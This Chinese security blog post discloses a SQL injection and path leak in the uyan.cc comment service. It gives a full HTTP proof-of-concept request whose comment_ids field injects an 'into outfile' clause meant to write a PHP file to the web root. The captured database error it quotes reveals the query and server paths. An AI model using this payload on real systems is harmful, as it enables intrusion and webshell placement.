当前位置: iick's blog > 网站漏洞 > 友言存在注入与文件路径泄露

友言存在注入与文件路径泄露

作者:hack1990 时间:11-10-22 阅读数:644人阅读

简要描述:

http://uyan.cc是新成立的社区评论创业公司,其对sql过滤不严导致漏洞发生。

详细说明:

http://uyan.cc/index.php/youyan_content/getRepliesTogether/time对post上来的数据未进行过滤。同时http://uyan.cc/index.php/youyan?title=%E5%9B%BD%E5%86%852%E4%BA%BA%E5%88%9B%E4%B8%泄露了文件路径。

但由于数据库跟web分离,into outfile直接拿webshell难。

漏洞证明:

POST http://uyan.cc/index.php/youyan_content/getRepliesTogether/time HTTP/1.1

 

Host: uyan.cc

 

Connection: keep-alive

 

Content-Length: 723

 

Origin: http://uyan.cc www.2cto.com

 

X-Requested-With: XMLHttpRequest

 

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1

 

Content-Type: application/x-www-form-urlencoded

 

Accept: application/json, text/javascript, */*

 

Referer: http://uyan.cc/index.php/youyan?pageId=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&domain=www.36kr.coma'%20&&%20'1'='2&master_id=2711%20&&%201=2&title=''''''-1&url=-1&pageImg=;%3C/javascript%3E&pageContent=-1

 

Accept-Encoding: gzip,deflate,sdch

 

Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6

 

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

 

Cookie: PHPSESSID=97ipt9bjm2otbd7j2cphg84444

 

 

 

comment_ids%5B%5D=168019&comment_ids%5B%5D=168031 and (select '11111' into outfile '//opt//lampstack-5.3.6-0//apache2//htdocs//controllers//1ssbbb.php' )=1&comment_ids%5B%5D=168020&comment_ids%5B%5D=168032&comment_ids%5B%5D=168007&comment_ids%5B%5D=168006&comment_ids%5B%5D=167967&comment_ids%5B%5D=167985&comment_ids%5B%5D=167986&comment_ids%5B%5D=167987&page=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&delStyle=0&reply_page_no%5B167967%5D=0&reply_page_no%5B167985%5D=0&reply_page_no%5B167986%5D=0&reply_page_no%5B167987%5D=0&reply_page_no%5B168006%5D=0&reply_page_no%5B168007%5D=0&reply_page_no%5B168019%5D=0&reply_page_no%5B168020%5D=0&reply_page_no%5B168031%5D=0&reply_page_no%5B168032%5D=0&session_name=uyan_www.36kr.com

 

 

<body>

 

       <div id="content">

 

              <h1>A Database Error Occurred</h1>

 

              <p>Error Number: 1064</p><p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1=1 order by comment.time desc limit 0, 3' at line 3</p><p>select user.*, comment.* from comment

 

          LEFT JOIN user ON user.user_id = comment.user_id

 

          where comment.del=0 and comment.reply_to_comment_id=168031 and '1=1 order by comment.time desc limit 0, 3</p><p>Filename: /opt/lampstack-5.3.6-0/apache2/htdocs/models/comment_model.php</p><p>Line Number: 251</p>     </div>

 

</body>

 

</html>

# Nmap Security Scanner 7.0

上一篇:科讯kesion 6.x - 7.06 漏洞

下一篇:骑士CMS(74cms) CSRF 后台 getshell

相关文章

发表评论